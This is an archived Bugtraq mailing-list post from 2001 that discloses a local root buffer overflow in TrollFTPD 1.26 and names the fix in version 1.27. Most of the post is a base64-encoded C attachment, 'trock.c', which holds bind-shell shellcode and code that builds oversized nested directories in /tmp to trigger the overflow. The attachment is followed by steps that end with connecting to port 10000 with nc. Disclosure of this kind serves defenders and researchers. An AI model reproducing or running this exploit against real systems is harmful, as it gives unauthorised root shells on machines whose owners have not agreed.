 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Mon, 13 Aug 2001 15:22:22 +1200 (NZST) From: zen-parse <zen-parse@gmx.net> To: bugtraq@securityfocus.com Subject: Local exploit for TrollFTPD-1.26 ---1463783680-1955057125-997672942=:9192 Content-Type: TEXT/PLAIN; charset=US-ASCII Affects: TrollFTPD 1.26 (probably earlier) Severity: local users can gain root access. Fix: upgrade to TrollFTPD-1.27 Fix URL: ftp://ftp.trolltech.com/freebies/ftpd/troll-ftpd-1.27.tar.gz Description: An error in the handling of recursive directory listings can result in an exploitable buffer overflow. Exploit: (offsets are for one machine. not guaranteed to work on any others.) Run the program, ftp localhost <in ftp> (your username) (your password) cd /tmp ls -R <out of ftp> Connect to port 10000 with nc Be nice. -- zen-parse -- ------------------------------------------------------------------------- The preceding information, unless directly posted by zen-parse@gmx.net to an open forum is confidential information and not to be distributed (without explicit permission being given by zen-parse@gmx.net). Legal action may be taken to enforce this. If you are mum or dad, this probably doesn't apply to you. ---1463783680-1955057125-997672942=:9192 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="trock.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.33.0108131522220.9192@clarity.local> Content-Description: TrollFTPD exploit Content-Disposition: attachment; filename="trock.c" Y2hhciBzaGVsbGNvZGVbXSA9DQogICAiXHg5MFx4OTBceDkwXHg5MFx4OTBc eDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4 OTBceDkwIg0KICAgIlx4MzFceGRiIiAgICAgICAgICAgICAgICAgICAvLyB4 b3IgIGVieCwgZWJ4DQogICAiXHhmN1x4ZTMiICAgICAgICAgICAgICAgICAg IC8vIG11bCAgZWJ4DQogICAiXHhiMFx4NjYiICAgICAgICAgICAgICAgICAg IC8vIG1vdiAgICAgYWwsIDEwMg0KICAgIlx4NTMiICAgICAgICAgICAgICAg ICAgICAgICAvLyBwdXNoICAgIGVieA0KICAgIlx4NDMiICAgICAgICAgICAg ICAgICAgICAgICAvLyBpbmMgICAgIGVieA0KICAgIlx4NTMiICAgICAgICAg ICAgICAgICAgICAgICAvLyBwdXNoICAgIGVieA0KICAgIlx4NDMiICAgICAg ICAgICAgICAgICAgICAgICAvLyBpbmMgICAgIGVieA0KICAgIlx4NTMiICAg ICAgICAgICAgICAgICAgICAgICAvLyBwdXNoICAgIGVieA0KICAgIlx4ODlc eGUxIiAgICAgICAgICAgICAgICAgICAvLyBtb3YgICAgIGVjeCwgZXNwDQog ICAiXHg0YiIgICAgICAgICAgICAgICAgICAgICAgIC8vIGRlYyAgICAgZWJ4 DQogICAiXHhjZFx4ODAiICAgICAgICAgICAgICAgICAgIC8vIGludCAgICAg ODBoDQogICAiXHg4OVx4YzciICAgICAgICAgICAgICAgICAgIC8vIG1vdiAg ICAgZWRpLCBlYXgNCiAgICJceDUyIiAgICAgICAgICAgICAgICAgICAgICAg Ly8gcHVzaCAgICBlZHgNCiAgICJceDY2XHg2OFx4MjdceDEwIiAgICAgICAg ICAgLy8gcHVzaCAgICB3b3JkIDQxMzUNCiAgICJceDQzIiAgICAgICAgICAg ICAgICAgICAgICAgLy8gaW5jICAgICBlYngNCiAgICJceDY2XHg1MyIgICAg ICAgICAgICAgICAgICAgLy8gcHVzaCAgICBieA0KICAgIlx4ODlceGUxIiAg ICAgICAgICAgICAgICAgICAvLyBtb3YgICAgIGVjeCwgZXNwDQogICAiXHhi MFx4MTAiICAgICAgICAgICAgICAgICAgIC8vIG1vdiAgYWwsIDE2DQogICAi XHg1MCIgICAgICAgICAgICAgICAgICAgICAgIC8vIHB1c2ggZWF4DQogICAi XHg1MSIgICAgICAgICAgICAgICAgICAgICAgIC8vIHB1c2ggICAgZWN4DQog ICAiXHg1NyIgICAgICAgICAgICAgICAgICAgICAgIC8vIHB1c2ggICAgZWRp DQogICAiXHg4OVx4ZTEiICAgICAgICAgICAgICAgICAgIC8vIG1vdiAgICAg ZWN4LCBlc3ANCiAgICJceGIwXHg2NiIgICAgICAgICAgICAgICAgICAgLy8g bW92ICAgICBhbCwgMTAyDQogICAiXHhjZFx4ODAiICAgICAgICAgICAgICAg ICAgIC8vIGludCAgICAgODBoDQogICAiXHhiMFx4NjYiICAgICAgICAgICAg ICAgICAgIC8vIG1vdiAgICAgYWwsIDEwMg0KICAgIlx4YjNceDA0IiAgICAg ICAgICAgICAgICAgICAvLyBtb3YgICAgIGJsLCA0DQogICAiXHhjZFx4ODAi ICAgICAgICAgICAgICAgICAgIC8vIGludCAgICAgODBoDQogICAiXHg1MCIg ICAgICAgICAgICAgICAgICAgICAgIC8vIHB1c2ggZWF4DQogICAiXHg1MCIg ICAgICAgICAgICAgICAgICAgICAgIC8vIHB1c2ggZWF4DQogICAiXHg1NyIg ICAgICAgICAgICAgICAgICAgICAgIC8vIHB1c2ggZWRpDQogICAiXHg4OVx4 ZTEiICAgICAgICAgICAgICAgICAgIC8vIG1vdiAgZWN4LCBlc3ANCiAgICJc eDQzIiAgICAgICAgICAgICAgICAgICAgICAgLy8gaW5jICBlYngNCiAgICJc eGIwXHg2NiIgICAgICAgICAgICAgICAgICAgLy8gbW92ICBhbCwgMTAyDQog ICAiXHhjZFx4ODAiICAgICAgICAgICAgICAgICAgIC8vIGludCAgODBoDQog ICAiXHg4OVx4ZDkiICAgICAgICAgICAgICAgICAgIC8vIG1vdiAgZWN4LCBl YngNCiAgICJceDg5XHhjMyIgICAgICAgICAgICAgICAgICAgLy8gbW92ICAg ICBlYngsIGVheA0KICAgIlx4YjBceDNmIiAgICAgICAgICAgICAgICAgICAv LyBtb3YgICAgIGFsLCA2Mw0KICAgIlx4NDkiICAgICAgICAgICAgICAgICAg ICAgICAvLyBkZWMgICAgIGVjeA0KICAgIlx4Y2RceDgwIiAgICAgICAgICAg ICAgICAgICAvLyBpbnQgICAgIDgwaA0KICAgIlx4NDEiICAgICAgICAgICAg ICAgICAgICAgICAvLyBpbmMgICAgIGVjeA0KICAgIlx4ZTJceGY4IiAgICAg ICAgICAgICAgICAgICAvLyBsb29wICAgIGxwDQogICAiXHg1MSIgICAgICAg ICAgICAgICAgICAgICAgIC8vIHB1c2ggICAgZWN4DQogICAiXHg2OFx4NTVc eDU1XHg1NVx4NTUiICAgICAgIC8vIHB1c2ggICAgZHdvcmQgNjg3MzJmNmVo DQogICAiXHg2OFx4NTVceDU1XHg1NVx4NTUiICAgICAgIC8vIHB1c2ggICAg ZHdvcmQgNjk2MjJmMmZoDQogICAiXHg4OVx4ZTMiICAgICAgICAgICAgICAg ICAgIC8vIG1vdiAgICAgZWJ4LCBlc3ANCiAgICJceDUxIiAgICAgICAgICAg ICAgICAgICAgICAgLy8gcHVzaCAgICBlY3gNCiAgICJceDUzIiAgICAgICAg ICAgICAgICAgICAgICAgLy8gcHVzaCBlYngNCiAgICJceDg5XHhlMSIgICAg ICAgICAgICAgICAgICAgLy8gbW92ICBlY3gsIGVzcA0KICAgIlx4YjBceDBi IiAgICAgICAgICAgICAgICAgICAvLyBtb3YgIGFsLCAxMQ0KICAgIlx4Y2Rc eDgwIjsgICAgICAgICAgICAgICAgICAvLyBpbnQgICAgIDgwaA0KDQptYWlu KCkNCnsNCiBjaGFyIGRpcls4MDAwXTsNCiBjaGFyIG5pcls4MDAwXTsNCiBp bnQgejA9MCxhMD0weDA4MDU5N2Y4Ow0KIGludCB6MT0wLGExPTB4YmZmOTY0 NTA7DQogaW50IGc7IA0KIHN0cmNweShkaXIsIi90bXAvcmV0cm9sbC8iKTsN CiBta2RpcihkaXIsMDc3Nyk7DQogcHJpbnRmKCIlZFxuIixzdHJsZW4oc2hl bGxjb2RlKSk7IA0KIHdoaWxlKHN0cmxlbihkaXIpPDQwNDApDQogew0KICBz dHJjYXQoZGlyLCJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUEvIik7DQogIG1rZGlyKGRpciwwNzc3KTsNCiB9DQogLy8gNDA0OCBz byBmYXIgIGxlYXZpbmcgNDggbGVmdC4NCiBpZihjaGRpcihkaXIpKXtwZXJy b3IoImNoZGlyIik7ZXhpdCgxKTt9DQogcHJpbnRmKCIlZCArICIsc3RybGVu KGRpcikpOw0KIHNwcmludGYoZGlyLCJBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQS8iKTsNCiBta2RpcihkaXIsMDc3Nyk7DQogc3lzdGVtKCJjcCAv YmluL3NoIEFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBL1VVVVVVVVVV Iik7DQogc3ByaW50ZihuaXIsIiVzQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB IixkaXIpOw0KIHNwcmludGYoZGlyLCIlc0dHR0c9QUFBQUFBQSVzQUFBQUFB QUFBQUFBJXNDQ0NDJXMiLG5pciwmYTAsJmExLHNoZWxsY29kZSk7DQogcHJp bnRmKCIlZCA9ICIsc3RybGVuKGRpcikpOw0KIG1rZGlyKGRpciwwNzc3KTsN Cn0NCg== ---1463783680-1955057125-997672942=:9192--
| |||||||||||||||||||||